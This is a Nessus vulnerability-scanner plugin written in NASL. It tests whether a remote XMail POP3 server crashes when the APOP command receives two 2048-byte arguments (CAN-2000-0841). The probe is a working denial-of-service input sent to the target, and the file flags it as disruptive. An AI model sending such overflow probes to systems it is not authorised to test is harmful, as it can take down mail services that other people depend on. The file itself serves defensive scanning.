File: xmail_overflow.nasl

#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 # Registration branch: the scanner runs the script once with `description`
 # set to collect metadata, then exits before the probe below executes.
 script_id(10559);
 script_cve_id("CAN-2000-0841");
 script_name(english:"XMail APOP Overflow",
 	francais:"Dpassement de buffer APOP dans XMail");

 # The long report texts stay in arrays; the short strings are passed inline.
 desc["english"] = "The remote POP3 server seems
to be subject to a buffer overflow when it receives
two too long arguments to the APOP command.

This problem may allow an attacker to disable this
pop server or to execute arbitrary code on this
host.

Solution : Contact your vendor for a patch
Risk factor : High";

 desc["francais"] = "
Le serveur POP3 distant semble etre vulnrable  un problme
de dpassement de buffer lorsqu'il recoit deux arguments trop longs
 la commande APOP.

Ce problmez peut permettre  un pirate d'executer du code
arbitraire sur ce serveur ou bien de dsactiver le serveur POP
 distance.

Solution : Contactez votre vendeur pour un patch
Facteur de risque : Elev";

 script_description(english:desc["english"], francais:desc["francais"]);

 script_summary(english:"Attempts to overflow the APOP command",
 	francais:"Essaye de trop remplir les buffers de la commande APOP");

 # ACT_DENIAL: the probe may take the target service down, so the scanner
 # treats it as a disruptive check rather than a safe one.
 script_category(ACT_DENIAL);

 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
 	francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 script_family(english:"Gain root remotely", francais:"Passer root  distance");

 # Ordering and gating: run after service discovery and the generic POP3
 # check, and skip hosts whose pop3 port was flagged as not a real POP3
 # server (pop3/false_pop3 -- presumably set by an earlier plugin).
 script_dependencie("find_service.nes", "qpopper.nasl");
 script_exclude_keys("pop3/false_pop3");
 script_require_ports("Services/pop3", 110);
 exit(0);
}

#
# The script code starts here
#

# Probe: connect, read the greeting, send an APOP command with two 2048-byte
# arguments, then decide from the server's behaviour whether it survived.
#
# Two signals lead to a report: (1) no reply at all to the oversized command,
# or (2) no greeting on a fresh connection made afterwards.
# NOTE(review): a server that simply drops the connection on a malformed
# command also yields "no reply", so signal (1) on its own can be a false
# positive; only signal (2) shows the daemon is actually gone. Confirm by
# re-scanning before acting on the finding.

# Honour the false-POP3 marker even though script_exclude_keys already gates
# on it.
if(get_kb_item("pop3/false_pop3"))exit(0);

port = get_kb_item("Services/pop3");
if(!port)port = 110;
if(!get_port_state(port))exit(0);

soc = open_sock_tcp(port);
if(!soc)exit(0);

# No greeting at all: nothing talking POP3 here, so there is nothing to test.
greeting = recv_line(socket:soc, length:1024);
if(!greeting)
{
 close(soc);
 exit(0);
}

probe = string("APOP ", crap(2048), " ", crap(2048), "\r\n");
send(socket:soc, data:probe);

# Signal (1): the server answered nothing to the oversized command.
reply = recv_line(socket:soc, length:1024);
if(!reply)
{
 security_hole(port);
 exit(0);
}
close(soc);

# Signal (2): the server no longer accepts connections, or accepts one but
# never sends its greeting.
soc = open_sock_tcp(port);
if(!soc)
{
 security_hole(port);
 exit(0);
}
greeting = recv_line(socket:soc, length:1024);
if(!greeting)security_hole(port);
close(soc);